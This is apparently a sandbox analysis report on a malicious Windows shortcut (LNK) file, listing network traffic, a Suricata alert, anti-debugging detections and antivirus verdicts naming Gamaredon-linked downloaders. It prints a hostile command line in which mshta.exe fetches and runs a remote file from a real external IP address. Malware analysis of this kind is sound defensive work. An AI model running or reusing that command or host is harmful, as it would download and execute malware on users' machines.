Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Aug. 10, 2024, 6:23 p.m. | Aug. 10, 2024, 6:26 p.m. |
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
5.39.254.55 | Active | Moloch |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49164 -> 5.39.254.55:80 | 2027257 | ET INFO Dotted Quad Host RTF Request | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://5.39.254.55/sp_08.08/days.rtf |
request | GET http://5.39.254.55/sp_08.08/days.rtf |
file | C:\Users\test22\AppData\Local\Temp\49fd9bf8a9029185e03f469c388fbe3c.lnk |
cmdline | "C:\Windows\System32\mshta.exe" http://5.39.254.55/sp_08.08/days.rtf /f |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
host | 5.39.254.55 |
Lionic | Trojan.WinLNK.Nioc.4!c |
Cynet | Malicious (score: 99) |
CAT-QuickHeal | LNK.APT.43736 |
VIPRE | Heur.BZC.YAX.Nioc.1.0B26EB2A |
Arcabit | Heur.BZC.YAX.Nioc.1.0B26EB2A |
Symantec | Trojan.Gen.NPE |
ESET-NOD32 | LNK/TrojanDownloader.Pterodo.G |
Avast | LNK:Agent-CR [Trj] |
Kaspersky | HEUR:Trojan.WinLNK.Gamaredon.gen |
BitDefender | Heur.BZC.YAX.Nioc.1.0B26EB2A |
MicroWorld-eScan | Heur.BZC.YAX.Nioc.1.0B26EB2A |
Emsisoft | Heur.BZC.YAX.Nioc.1.0B26EB2A (B) |
F-Secure | Malware.LNK/Dldr.Agent.VPTN |
FireEye | Heur.BZC.YAX.Nioc.1.0B26EB2A |
Sophos | Troj/DownLnk-X |
Detected | |
Avira | LNK/Dldr.Agent.VPTN |
MAX | malware (ai score=83) |
Microsoft | Trojan:Win32/ShortSeek.E!dha |
ZoneAlarm | HEUR:Trojan.WinLNK.Gamaredon.gen |
GData | Heur.BZC.YAX.Nioc.1.0B26EB2A |
Varist | LNK/ABTrojan.UXKK- |
Zoner | Probably Heur.LNKScript |
Tencent | Win32.Trojan.Gamaredon.Rsmw |
huorong | Trojan/LNK.Starter.r |
Fortinet | LNK/Agent.VPTN!tr |
AVG | LNK:Agent-CR [Trj] |
alibabacloud | Trojan[downloader]:Win/ShortSeek.E9hyq |